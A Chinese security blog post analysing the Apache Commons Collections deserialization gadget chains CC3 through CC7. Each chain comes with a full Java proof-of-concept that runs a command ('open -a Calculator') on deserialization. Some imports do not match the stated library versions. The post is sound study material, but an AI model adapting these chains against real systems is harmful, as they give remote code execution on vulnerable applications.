CommonsCollections 3~7分析

最新推荐文章于 2023-07-18 23:26:44 发布
最新推荐文章于 2023-07-18 23:26:44 发布
阅读量317 收藏
点赞数 1
分类专栏: JAVA安全 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31065143/article/details/115446142
版权

CommonsCollections 3~7分析

前言

看完了CC1和CC2后面的内容都简单的多了,所以就一起分析一下。

CC3

测试环境

  • jdk1.7
  • Commons Collections 4.0

漏洞分析

cc3和cc1和cc2蛮像的,就是cc1+cc2的变种,在cc3中引入了新的类TrAXFilter和InstantiateTransformer。在cc2中是利用InvokeTransform触发newTransFormer进行命令执行的,而在cc3中,则是通过TrAXFilter触发NewTransFormer进行命令执行的。

public class TrAXFilter extends XMLFilterImpl {
	private Templates              _templates;
	private TransformerImpl        _transformer;
	private TransformerHandlerImpl _transformerHandler;
	private boolean _useServicesMechanism = true;

	public TrAXFilter(Templates templates)  throws
    	TransformerConfigurationException
	{
    		_templates = templates;
    		_transformer = (TransformerImpl) templates.newTransformer();
    		_transformerHandler = new TransformerHandlerImpl(_transformer);
    		_useServicesMechanism = _transformer.useServicesMechnism();
	}

我们看见templates这个字段,这个字段是可控的,因此我们只需要通过反射修改templates的内容,再找到一个点,可以将TrAXfilter初始化就可以了。而这里通过反射修改templates和cc2中的一样,下面给出代码:

	ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("Poc");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"open -a Calculator\");";
        // 创建 static 代码块,并插入代码
        cc.makeClassInitializer().insertBefore(cmd);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        // 写入.class 文件
        byte[] classBytes = cc.toBytecode();
        byte[][] targetByteCodes = new byte[][]{classBytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        // 进入 defineTransletClasses() 方法需要的条件
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

那我们又要如何初始化TrAXfilter呢,上面我们提到过InstantiateTransformer,我们来看看它的代码。

我们只需要将input设置为TrAXfilter,就可以进行初始化了。下面给出POC:

package cc3;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;


public class Poc {

    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("Poc");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"open -a Calculator\");";
        // 创建 static 代码块,并插入代码
        cc.makeClassInitializer().insertBefore(cmd);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        // 写入.class 文件
        byte[] classBytes = cc.toBytecode();
        byte[][] targetByteCodes = new byte[][]{classBytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        // 进入 defineTransletClasses() 方法需要的条件
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        });

        HashMap innermap = new HashMap();
        LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);


        Constructor handler_constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        handler_constructor.setAccessible(true);
        InvocationHandler map_handler = (InvocationHandler) handler_constructor.newInstance(Override.class,map); //创建第一个代理的handler

        Map proxy_map = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class},map_handler); //创建proxy对象


        Constructor AnnotationInvocationHandler_Constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class,Map.class);
        AnnotationInvocationHandler_Constructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler)AnnotationInvocationHandler_Constructor.newInstance(Override.class,proxy_map);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc3"));
            outputStream.writeObject(handler);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc3"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }

    }
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        }
        catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}

CC4

测试环境

  • jdk1.7
  • Commons Collections 4.0

漏洞分析

我们先来看看Poc的样子

package cc4;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class Poc {
    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("Poc");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"open -a Calculator\");";
        // 创建 static 代码块,并插入代码
        cc.makeClassInitializer().insertBefore(cmd);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName())); //设置父类为AbstractTranslet,避免报错
        // 写入.class 文件
        byte[] classBytes = cc.toBytecode();
        byte[][] targetByteCodes = new byte[][]{classBytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        // 进入 defineTransletClasses() 方法需要的条件
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

        Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer").getDeclaredConstructor(String.class);
        constructor.setAccessible(true);
        InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");

        TransformingComparator comparator = new TransformingComparator(transformer);
        PriorityQueue queue = new PriorityQueue(1);

        Object[] queue_array = new Object[]{templates,1};

        Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
        queue_field.setAccessible(true);
        queue_field.set(queue,queue_array);

        Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue,2);


        Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator_field.setAccessible(true);
        comparator_field.set(queue,comparator);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc4"));
            outputStream.writeObject(queue);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc4"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }
    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        }
        catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}

我们可以看见cc4点Poc很眼熟啊,就是cc2➕cc3.cc3前半段用了cc1的利用链,这里将利用链改成了cc2的。

Commons Collections 5

测试环境:

  • jdk 1.7
  • Commons Collections 4.0

漏洞分析

在cc1中只要通过LazyMap#get()传递任意内容就可以触发命令执行。cc5中利用到的是TiedMapEntry这个类。我们跟进去看看。

跟入TiedMapEntry#toString的getValue中看看。

这里调用了get,我们先来试试看可否执行命令:

所以现在我们就要寻找什么地方调用了toString这个函数,而在cc5中用到的是这个函数BadAttributeValueExpException

我们通过寻找网上的Poc都是通过反射的反射修改val值的,但是其实这里并不需要这么做

通过阅读上面的代码,虽然这里的val是private属性,然而BadAttributeValueExpException却是public。

所以我们直接调用就可以了

BadAttributeValueExpException poc = new BadAttributeValueExpException(tiedmap);

也是可以执行命令的。

注意!

其实这里是不可以直接调用的,而是需要通过反射。

如图,这里的执行是生成反序列化的时候进行命令执行的,而不是通过读取反序列化时触发,原因是此时val的值为UNIXProcess,这是不可以被反序列化的,所以我们需要在不触发rce的前提,将val设置为构造好的TiedMapEntry。

下面给出Poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;

public class cc5 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, new Object[]{"open -a Calculator.app"})});
        HashMap innermap = new HashMap();
        LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
        TiedMapEntry tiedmap = new TiedMapEntry(map,123);
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,tiedmap);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc5"));
            outputStream.writeObject(poc);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc5"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

CC6

测试环境

  • jdk1.7
  • Commons Collections 3.2

漏洞分析

在cc6的后半段链使用的是cc1中的链,在cc5,通过对TiedMapEntry#toString方法的调用,触发了TiedMapEntry#getValue,从而触发了LazyMap#get完成后半段的调用。而在cc6中则是通过TiedMapEntry#hashCode触发对TiedMapEntry#getValue的调用:

现在就来寻找,哪里调用了hashCode()。

如上图中的HashMap#hash调用了,而在HashMap#put中则调用了hash方法,

而此时的key值依旧是不可控的,我们还需要寻找哪里调用了put。

此时我们可以构造Poc了。

package cc6;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;

public class cc6 {

    public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, new Object[]{"open  /System/Applications/Calculator.app"})});

        HashMap innermap = new HashMap();
        LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);

        TiedMapEntry tiedmap = new TiedMapEntry(map,123);

        HashSet hashset = new HashSet(1);
        hashset.add("foo");

        Field field = Class.forName("java.util.HashSet").getDeclaredField("map");
        field.setAccessible(true);
        HashMap hashset_map = (HashMap) field.get(hashset);

        Field table = Class.forName("java.util.HashMap").getDeclaredField("table");
        table.setAccessible(true);
        Object[] array = (Object[])table.get(hashset_map);

        Object node = array[0];

        Field key = node.getClass().getDeclaredField("key");
        key.setAccessible(true);
        key.set(node,tiedmap);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc6"));
            outputStream.writeObject(hashset);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc6"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

第一个红框处主要是利用反射获取我们的 HashSet 的 map 属性,因为我们要先获取到 map 才能对 map 的 key 进行修改

第二个红框处则是修改我们 HashMap 中的 key 值为 hashset

在这里利用反射获取了 HashMap 中的 table 属性,table其实就是hashmap的存储底层,将 封装在了 Node 对象中,在获取到了 table 中的 key 之后,利用反射修改其为 hashset.(这里抄了木爷的hh)

CC7

测试环境

  • jdk1.7
  • Commons Collections 3.2

漏洞分析

Poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.*;

public class cc7 {

    public static void main(String[] args) throws Exception {
        Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"open -a Calculator.app"})
        };

        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();

        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
        lazyMap1.put("pp", 1);

        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
        lazyMap2.put("yy", 1);

        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);

        Field field =transformerChain.getClass().getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(transformerChain,transformers);

        lazyMap2.remove("yy");

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc7"));
            outputStream.writeObject(hashtable);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc7"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }

    }
}

在cc1中是通过AnnotationInvocationHandler#invoke来触发对恶意代理handler调用其invoke方法从而触发LazyMap#get方法.而cc7中更加的直接,通过AbstractMap#equals来触发对LazyMap#get方法的调用:

这里的就讲讲为什么要put两次:
在第一次调用reconstitutionPut时,会把key和value注册进table中:

此时由于tab[index]里并没有内容,所以并不会走进这个for循环内,而是给将key和value注册进tab中。在第二次调用reconstitutionPut时,tab中才有内容,我们才有机会进入到这个for循环中,从而调用equals方法。这也是为什么要调用两次put的原因。

为什么最后要 remove?而且为什么这里 remove(“yy”)

首先来说一下为什么最后要 remove ,因为在 AbstractMap#equals 这里的 size()等于1,而我们不remove的话 m.size()就为2并且直接返回 false,导致无法进入到后面。那么为什么要 remove(“yy”),这里我们需要从 writeObject 中进行查看,在生成 payload 时,当我们利用 put 放入的时候会调用 equals,从而也会触发一次 AbstractMap#equals。里面会多出一个yy,如果不去掉,就会进入上面说的 AbstractMap#equals 中的 if 判断那段,从而导致无法进入到我们的出发点。

pyshare
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化(三)Common Collection 1分析
Vicl1fe的博客
03-26 810
前言 环境 jdk 1.7 Commons Collections 3.1 idea idea创建maven项目,在pom.xml添加即可 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version>
Java反序列化(五)Common Collection 3分析
Vicl1fe的博客
05-31 302
前言 环境 jdk 1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 ObjectInputStream.readO
Java安全CommonsCollections7
qq_52988816的博客
08-17 511
Hashtable在调用put方法添加元素的时候会调用equals方法判断是否为同一对象,而在equals中会调用LazyMap的get方法添加一个元素(yy=yy),如果lazyMap2和lazyMap1中的元素个数不一样则直接返回false,那么也就不会触发漏洞。所以我们可以这样:在添加第二个元素后,lazyMap2需要调用remove方法删除元素。...
[java安全]类加载器&CommonsCollections3
leekos的博客,分享web安全相关知识~
07-18 510
前面我们学习了等等cc链,这里我们学习第三条链子,这里需要用到类,由于这个类会使用到一些类加载器中相关的知识,所以我们需要先学习一些类加载器知识需要注意的是,类对加载的字节码是有要求的,这个字节码对应的类必须是类的子类所以我们构造一个特殊的类,继承类我们执行一下,得到结果:是一个可以加载字节码的类,通过调用方法,可以执行这段字节码的类构造方法。
java--CommonsCollections7 学习
zyer
05-31 215
根据之前的学习,发现看cc7应该很简单了。(环境:JDK8u311) cc6使用了HashMap和HashSet,cc7使用的是Hashtable Hashtable 与 HashMap 十分相似,是一种 key-value 形式的哈希表,但仍然存在一些区别: HashMap 继承 AbstractMap,而 Hashtable 继承 Dictionary ,可以说是一个过时的类。 两者内部基本都是使用“数组-链表”的结构,但是 HashMap 引入了红黑树的实现。 Hasht
commonscollections_map1rq_java_
10-02
标题中的"commonscollections_map1rq_java_"暗示了我们讨论的主题是关于Java编程语言中一个特定的安全问题,即Apache Commons Collections库的一个已知反序列化漏洞。Apache Commons CollectionsJava开发人员常用...
CommonsCollection7反序列化链学习.doc
07-09
CommonsCollections7反序列化链学习是针对Apache Commons Collections库中的一个安全漏洞的研究。这个漏洞主要涉及不安全的反序列化过程,攻击者可以利用它来执行任意代码。以下是关于这个话题的详细解释: 1. **...
commons.collections_3.2.0.jar
03-16
Javaweb开发所需要的commons.collections_3.2.0.jar包,该jar包包含了一些与Javaweb开发中jsp相关的封装类。
ysomap:一个基于ysererial的有用的Java反序列化利用框架
05-14
在实际分析ysoserial的利用链时,有时候会觉得框架写的太死,有以下几个缺点: 同一个利用链如果想改变一下最后的利用效果,如命令执行改成代码执行,我们需要改写这个利用链或者是重新增加一个利用链。这时,我们...
ysoserial-0.0.6-SNAPSHOT-all.jar
12-19
ysoserial-0.0.6 也可自行下载编译 提供个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
commons-collections-3.2.2、4-4.1
11-07
修复weblogic反序列化漏洞,修复方法为:替换原来的common-collections组件,建议:原来是3.2.d就替换为3.2.2,原来是4.x,就替换为4.4.1,如果出现不兼容,则替换一个版本试试。 1.先停止weblogic 2.替换oracle\modules目录里的com.bean.core.apache.commons.collections_x.x.x.jar 3.启动weblogic
commons-collections-3.2.2-
11-01
用来修补weblogic的反序列化漏洞,重命名后替换之前Middleware\modules下的的3.2.0版
commons-collections所有版本(1.0-3.2.1).zip
10-14
commons-collections所有版本(1.0-3.2.1).zip
[Java反序列化]—CommonsCollections7(CC完结篇)
Sentiment的博客
06-05 1200
CC7其实又跟CC5差不多,也是换了另一种方式来调用 流程 还是现根据链子先看下流程吧。中重写了,最后会调用 中,调用了方法— 所以就要看下哪里的()有问题,找到了类 最后还会retrun map.equals(object);,所以就要找下个,在中找到了 最后调用了方法,所以如果构造m为LazyMap对象,就可以成功向下执行 分析 在网上找了一些分析笔记但感觉分析的都不是很详细,而且这里涉及很多数据结构的内容,所以我这里也是尽可能的详细分析一下首先在执行readObject后,会在1173行对赋值,赋值后
CommonsCollections3分析
笑花大王
12-26 257
第一章 什么是sql注入 TemplatesImpI类分析 进入TemplatesImpl进行分析 分析getTransletInstance 这里有两个判断条件 如果_name==null 返回null 如果_class==null就调用defineTransletClasses() 下来跟进defineTransletClasses() 分析defineTransletClasses...
Commons-Collections3
Le1a's Blog
03-23 501
Commons-Collections3 文章首发自: https://www.le1a.com/posts/fb41fa9a/ 前言 CC1和CC6都是用Runtime.exec()命令调用来执行命令。CC3、CC2、CC4这几个都是用的动态类加载来执行代码,动态类加载可以看之前发的文章: Java动态类加载 漏洞分析 使用动态类加载来执行代码,就需要用到defineClass类来处理字节码,将其处理为真正的Java类。但由于ClassLoader类里的defineClass都是protected属性,
12-java安全——java反序列化CC7链分析
网络安全
08-23 2652
分析CC7链之前,需要对Hashtable集合的源码有一定的了解。 从思路上来说,我觉得CC7利用链更像是从CC6利用链改造而来,只不过是CC7链没有使用HashSet,而是使用了Hashtable来构造新的利用链。 经过测试,CC7利用链在jdk8u071和jdk7u81都可以利用成功,payload代码如下: package com.cc; import org.apache.commons.collections.Transformer; import org.apache.commo
CommonsCollection7分析
笑花大王
01-02 623
CommonsCollection7调用流程 调用链 HashTable.readObject() | TransformingComparator.compare() | InstantiateTransformer.transform() | TrAXFilter.TrAXFilter() | TemplatesImpl.newTransformer() ...
Java安全CommonsCollections3
阿道夫的博客
01-09 364
因为CC2链主要考察的是动态加载恶意字节码,而CC3也差不多,所以就选一个跟了,CC3链大体上是CC1和CC2链的结合,所以我我们只跟CC3链了。在CC1中,我们为了调用方法使用了InvokerTransformer这个类完成回调,但是如果对其进行了限制,我们CC1就不能使用了,根据上文学习的动态加载字节码,TemplatesImpl动态加载字节码来替换掉原来的回调链。
weblogic和fastjson反序列化漏洞原理分析及复现
最新发布
09-07
1. WebLogic反序列化漏洞原理分析及复现: WebLogic反序列化漏洞是指通过利用WebLogic Server中T3协议的漏洞,攻击者可以在目标服务器上执行任意代码。这个漏洞的根本原因是WebLogic Server在处理T3协议时未正确过滤...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值